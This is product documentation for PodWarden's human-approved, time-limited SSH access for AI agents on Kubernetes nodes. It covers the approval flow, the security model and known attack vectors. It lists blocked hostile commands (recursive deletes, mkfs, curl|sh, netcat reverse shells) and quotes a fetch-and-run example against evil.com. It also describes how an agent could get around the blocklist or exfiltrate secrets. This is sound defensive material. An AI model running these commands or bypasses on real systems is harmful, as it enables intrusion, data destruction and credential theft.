Node SSH Access
How AI agents get time-limited SSH access to your nodes, the security model, known risks, and what you should prepare before enabling it
PodWarden lets AI agents request SSH access to your Kubernetes nodes for troubleshooting. This page explains exactly how it works, what can go wrong, and what you need to do to stay safe.
Read this entire page before enabling Node SSH Access on any MCP token.
Why this exists
AI agents connected via MCP are effective at managing workloads, but some problems require looking at the node itself — checking journalctl logs, inspecting kubectl output from a specific node, diagnosing network issues with ip or ss, checking disk usage. Without SSH access, the agent has to describe the commands and you have to run them manually.
Node SSH Access lets the agent run these commands directly, but only after you explicitly approve each session in a live-monitored dashboard.
Consider run_in_pod first. For tasks inside application containers — fixing PVC permissions, running app CLI tools, checking config files, debugging connectivity — use run_in_pod instead. It requires no approval ceremony, no SSH grants, and is isolated to the container. Only use Node SSH Access for node-level operations like journalctl, systemctl, or ip addr. See Agent Best Practices for a comparison.
The full lifecycle
Here is exactly what happens, step by step:
Step-by-step breakdown
-
Agent requests access. The AI calls
request_node_access(host_id, reason, duration). PodWarden creates a pending grant and returns an approval URL. -
Agent gives you the URL. The AI cannot approve its own request. It presents the URL and waits.
-
You open the URL. The approval page shows:
- Which host and cluster the agent wants to access
- The agent's stated reason
- Which MCP token is requesting access
- The session duration (default 5 minutes, max 60 minutes)
- A summary of what commands are allowed and blocked
- A link to this documentation page
-
You log in fresh. PodWarden requires recent authentication (within 2 minutes) to approve. If you're using OIDC/Keycloak, you'll be prompted to log in again. If you're using local auth, you'll need a fresh sign-in. This prevents approval by stale browser sessions.
-
You approve. The grant becomes active. The page transitions to a live monitoring dashboard.
-
Agent runs commands. Each command is validated against the blocklist before execution. You see every command, its output, and whether it was allowed or blocked — in real time via server-sent events.
-
Session ends. After the configured duration (or when you click Revoke), the grant expires. No more commands can be executed. The dashboard shows a summary of everything that happened.
What the agent can and cannot do
Allowed
The agent can run single commands or commands piped to safe filters:
kubectl get pods -A,kubectl describe node k3s-1,kubectl logs deployment/myappjournalctl -u k3s --since "1 hour ago" --no-pagersystemctl status k3s,systemctl status containerdcrictl ps,crictl images,crictl logsdf -h,free -m,top -bn1,ps aux,uptime,lsblkip addr,ip route,ss -tlnp,ping -c3 10.0.0.1cat /etc/k3s/config.yaml,ls /var/lib/rancher/k3s/- Any command piped to:
grep,head,tail,wc,sort,awk,sed,jq,cut,uniq,tr,column,cat,xargs
Blocked
These patterns are blocked before the command reaches SSH:
| Category | Examples | Why |
|---|---|---|
| Destructive file ops | rm -r, mkfs, dd if=, wipefs | Could destroy data or filesystems |
| System control | reboot, shutdown, poweroff, init 0 | Could take the node offline |
| User management | passwd, useradd, userdel | Could create backdoor accounts |
| Permission changes | chmod 777, chown -R | Could weaken file security |
| K8s destructive | kubeadm reset, k3s-uninstall, k3s-agent-uninstall | Could destroy the cluster |
| Network destructive | iptables -F, ip link delete | Could break networking |
| Service stopping | systemctl stop/disable/mask sshd/k3s/networking | Could lock you out |
| Remote code exec | curl|sh, wget|sh, python -c, perl -e, eval | Could execute arbitrary code |
| Reverse shells | nc -l, nc -e | Could open backdoor connections |
Blocked shell operators
These shell features are blocked entirely:
- Command chaining:
;,&&,||— prevents running multiple commands in sequence - Command substitution:
$(...),`...`— prevents embedding commands inside commands - Redirection:
>,<,>>— prevents writing to files on the node
Pipes (|) are allowed but only to a restricted set of read-only commands (grep, head, tail, jq, etc.).
Single-quoted strings are safe. Operators inside single quotes are treated as literal text, not shell syntax. This means commands like kubectl get cm -o jsonpath='{.data.config}' or kubectl patch deploy --type merge -p '{"spec":{"replicas":2}}' work correctly — the {, $, and other characters inside the single quotes are not flagged as blocked operators.
Security model
What we trust
- Your PodWarden instance. The API server runs the command validation and SSH execution. If someone compromises your PodWarden instance, they already have your SSH keys and don't need this feature.
- The SSH key. PodWarden uses the same SSH key it already uses for provisioning. Node SSH Access does not introduce new credentials — it uses existing ones in a more controlled way.
- The blocklist. Command validation happens server-side before SSH execution. The AI agent never sees or controls the SSH connection directly.
What we do NOT trust
- The AI agent. The agent submits commands as text strings. PodWarden treats every command as potentially hostile and validates it against the blocklist. The agent cannot bypass validation because it never gets direct SSH access — it only gets an API endpoint that happens to run SSH commands after validation.
- The MCP token. Having an MCP token with
node_ssh_access=enabledonly lets the agent create pending grants. A human must still approve each session. - The approval URL. It's a one-time-use link to a pending grant. Opening it doesn't approve anything — you still need to authenticate and click approve.
The approval ceremony
The fresh-login requirement exists because SSH approval should be a deliberate act, not something that happens because you left a browser tab open. The 2-minute window on JWT freshness means:
- You must actively log in to approve
- A compromised browser session from yesterday cannot approve grants
- If you walk away from your computer, pending grants expire in 10 minutes
Known attack vectors
We are transparent about what could go wrong. These are the scenarios we've identified and how we mitigate them, but you should evaluate these risks for your own environment.
1. Blocklist bypass
Risk: The blocklist is pattern-based (regex). A sufficiently creative command could bypass it.
Examples of what the blocklist catches: rm -rf /, reboot, curl http://evil.com/script.sh | bash
Examples that could theoretically bypass it: A command that uses an obscure binary already on the node, or a kubectl exec into a pod that then runs destructive commands inside the container.
Mitigation: The blocklist is defense-in-depth, not the sole security boundary. The real security boundaries are:
- The human must approve each session
- You watch every command in real time
- Sessions expire quickly (default 5 minutes)
- You can revoke instantly
What you should do: Understand that the blocklist reduces risk but does not eliminate it. If the agent runs a command you don't recognize, revoke the session immediately.
2. Indirect command execution
Risk: Allowed commands like kubectl exec could be used to run arbitrary commands inside a pod, which then affects the node (e.g., a privileged pod).
Mitigation: This is a Kubernetes security concern, not specific to this feature. If your pods run as privileged or have host mounts, they're already a risk vector regardless of how the kubectl command arrives.
What you should do: Follow Kubernetes security best practices — don't run pods as privileged, use Pod Security Standards, minimize host mounts. These are good practices regardless of whether you use Node SSH Access.
3. Information exfiltration
Risk: The agent can read files and command output. It could read sensitive data (secrets in environment variables, config files with credentials, etc.) and include them in its response to you — which may be logged by the AI provider.
Mitigation: This is inherent to giving any SSH access. The blocklist prevents writing/modifying, but reading is allowed by design (that's the whole point of troubleshooting).
What you should do:
- Be aware that command output flows through the AI provider's API
- Don't approve SSH access to nodes with sensitive data you wouldn't share with the AI provider
- Use Kubernetes secrets (not environment variables) for sensitive values
- Consider what's on the node before approving
4. MCP token theft
Risk: If an attacker steals an MCP token with node_ssh_access=enabled, they can create pending grants and submit the approval URL through social engineering.
Mitigation:
- Pending grants expire in 10 minutes
- Fresh authentication is required to approve
- The approval page shows which MCP token is requesting access — if you don't recognize it, deny
- Revoke compromised tokens immediately (Settings -> MCP -> trash icon)
What you should do: Treat MCP tokens like API keys. Don't share them. Rotate them periodically. Use the minimum number of tokens with SSH access enabled.
5. Session duration abuse
Risk: The agent requests a long session (up to 60 minutes) and runs many commands that you can't review fast enough.
Mitigation: You choose the approval — if the requested duration seems too long, deny it and ask the agent to request a shorter one. You can also revoke at any time.
What you should do: Start with short durations (5 minutes). Only approve longer sessions when you understand what the agent needs to do. Keep the monitoring dashboard visible.
6. SSH key scope
Risk: The SSH key used for this feature is the same key PodWarden uses for provisioning. If a command exploit leads to key extraction, the attacker has the provisioning key.
Mitigation: The key is written to a temporary file for each command execution and deleted immediately after. The agent never sees the key — only command output.
What you should do: Use separate SSH keys per host where possible (Settings -> Secrets -> SSH key pairs, then assign per host). This limits blast radius if any single key is compromised.
Before you enable this
Checklist
-
You understand the risks. Read the attack vectors above. This feature gives AI agents controlled access to run commands on your infrastructure.
-
You have monitoring in place. The live dashboard is your primary control. Don't approve and walk away.
-
You can recover. Know how to restore your nodes if something goes wrong. Have backups. Know how to re-provision a node with PodWarden if it gets into a bad state.
-
You've limited the blast radius.
- Enable
node_ssh_accesson as few MCP tokens as possible - Use dedicated SSH keys per host
- Keep session durations short
- Enable
-
You trust the AI provider. Command output passes through the AI provider's API. If your nodes contain data you can't share with the provider, don't approve SSH access to those nodes.
-
You know how to revoke. Both from the monitoring dashboard (big red button) and from the MCP token settings page (revoke the entire token).
Enabling Node SSH Access
Per-token toggle
Node SSH Access is disabled by default on all MCP tokens. To enable it:
- Go to Settings -> MCP
- Find the token in the table
- Toggle the SSH column switch to on (green)
This only allows the token to request access. A human must still approve each session.
Disabling
Toggle the switch back to off, or revoke the token entirely. Any active grants from that token will continue until they expire — they are not retroactively revoked when you disable the token setting. To immediately stop an active session, use the Revoke button on the monitoring dashboard.
Monitoring a session
When you approve an SSH access grant, the page becomes a live monitoring dashboard:
- Countdown timer shows remaining time with a progress bar. Turns red when under 60 seconds.
- Revoke button immediately terminates the session. Always visible.
- Command log shows every command the agent submits:
- Green border: command succeeded (exit code 0)
- Amber border: command ran but returned non-zero exit code
- Red background: command was blocked by the validation rules
- Each entry shows the command, execution time, stdout, and stderr
The log auto-scrolls to the latest entry. After the session ends, the log remains visible as an audit record for that browser tab.
FAQ
Can the agent approve its own request?
No. Approval requires a JWT from a human admin who logged in within the last 2 minutes. MCP tokens cannot approve grants.
What happens if my browser closes during an active session?
The session continues until it expires. The agent can still run commands. You can reopen the approval URL to reconnect to the monitoring stream. To stop the session early, reopen the URL and click Revoke.
Are commands logged permanently?
No. Grants and their command logs are stored in memory only. They're cleaned up 1 hour after the session ends. If PodWarden restarts, all grants are lost. For permanent audit trails, use the MCP Activity Log which records all API calls including command executions.
Can I restrict which hosts the agent can access?
Currently, any host in PodWarden can be requested. The control is at the approval step — you decide whether to approve each request based on the target host. Per-host restrictions may be added in a future release.
What if the agent requests access and I'm not available?
Pending grants expire after 10 minutes. The agent will get an expiry notice and would need to request again when you're available.
Does this work without OIDC/Keycloak?
Yes. If you use local authentication (username/password), the approval page redirects to the local sign-in page. The fresh-login requirement still applies — your JWT must have been issued within the last 2 minutes.
Can multiple agents have active sessions on the same node?
Yes. Each grant is independent. This is by design for cases where you might have different agents troubleshooting different issues. Each session has its own monitoring dashboard.